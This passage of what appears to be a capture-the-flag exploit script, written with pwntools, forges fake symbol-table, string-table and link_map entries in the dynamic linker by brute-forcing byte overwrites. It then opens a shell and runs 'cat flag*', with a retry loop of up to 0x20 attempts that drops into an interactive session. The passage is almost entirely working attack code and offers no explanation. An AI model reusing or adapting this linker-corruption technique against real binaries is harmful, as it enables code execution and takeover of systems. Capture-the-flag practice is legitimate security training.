# do_offset(LIBC_LINK_MAP_OFF+1, ((BASE_ADDR_NEW >> 8) & 0xff))
# do_offset(LIBC_LINK_MAP_OFF, ((0xe2-0x20) & 0xff))
# pause()
# do_brute(info_off(DT_SYMTAB), FAKE_SYMTAB_INFO_BIN_OFF-8)
# do_brute(info_off(DT_STRTAB), FAKE_STRTAB_INFO_BIN_OFF-8)
# do_brute(info_off(FAKE_SYMTAB_INFO_IDX), SYMTAB_BASE + 0x18)
# do_brute(info_off(FAKE_STRTAB_INFO_IDX), STRTAB_BASE + 0x2a)
# do_offset(info_off(DT_SYMTAB), (SYMTAB_BASE + 0x18) & 0xff)
# do_offset(info_off(DT_STRTAB), (STRTAB_BASE + 0x2a) & 0xff)
log.info("create fake symtab element")
GET_IMM_FAKE_SYMTAB_OFF = FAKE_SYMTAB_BUF_OFF + 0x18*GET_IMM_SYMIDX
fake_symtab = p32(0x89) + p8(0x12) + p8(0) + p16(0xe) + p64(0x1211) + p16(0xb)
# do_bs(GET_IMM_FAKE_SYMTAB_OFF, fake_symtab)
# 1268
# do_offset(GET_IMM_FAKE_SYMTAB_OFF, 0x89)
# do_offset(GET_IMM_FAKE_SYMTAB_OFF+4, 10 | 0x10)
do_offset(GET_IMM_FAKE_SYMTAB_OFF+4, 0x12)
do_offset(GET_IMM_FAKE_SYMTAB_OFF+6, 0xe)
TARGET = 0x1054
TARGET = 0x1070
do_bs(GET_IMM_FAKE_SYMTAB_OFF+8, p16(TARGET))
# do_bs(GET_IMM_FAKE_SYMTAB_OFF+0x10, p8(0xb))
# log.info("Create fake fini element")
FAKE_FINI_BUF_OFF = 0x10
FAKE_FINI_BIN_OFF = FAKE_FINI_BUF_OFF + BUFFER_BASE
# do_bs(FAKE_FINI_BUF_OFF+8, p16(0x120C))
# do_brute(info_off(DT_FINI), FAKE_FINI_BIN_OFF)
# pause()
# do_bs(LINK_MAP_OFF + NEXT_OFF, b"\0"*8)
log.info("GOING AWAY")
# pause()
log.info("FAKE_STR @ 0x%x", FAKE_STRTAB_BUF_OFF + FAKE_SYM_STR_OFF + BUFFER_BASE)
try:
if NUM_OFFSETS < 30:
do_exit()
import time
io.recvuntil(b"MENU")
time.sleep(0.1)
io.sendline(b"sh")
time.sleep(0.1)
io.sendline(b"cat flag*")
except:
return io, False
try:
# io.sendline(b"1")
print(io.recvuntil(b"SEC").decode())
except:
return io, False
return io, True
if args.ADD:
link_map_add = int(args.ADD, 0)
else:
link_map_add = 0x220
if not args.LOCAL:
link_map_add = 0x460
if args.OFF:
main_off = int(args.OFF, 0)
else:
main_off = 0
if args.LOCAL and not args.BRUTE:
io, _ = do_exploit(link_map_add, main_off)
io.interactive()
else:
for i in range(0x20):
log.info("Attempt %d, add: 0x%x, off: 0x%x", i, link_map_add, main_off)
io, ret = do_exploit(link_map_add, main_off)
if ret == False:
try:
io.close()
except:
pass
continue
io.interactive()
# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)
# io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment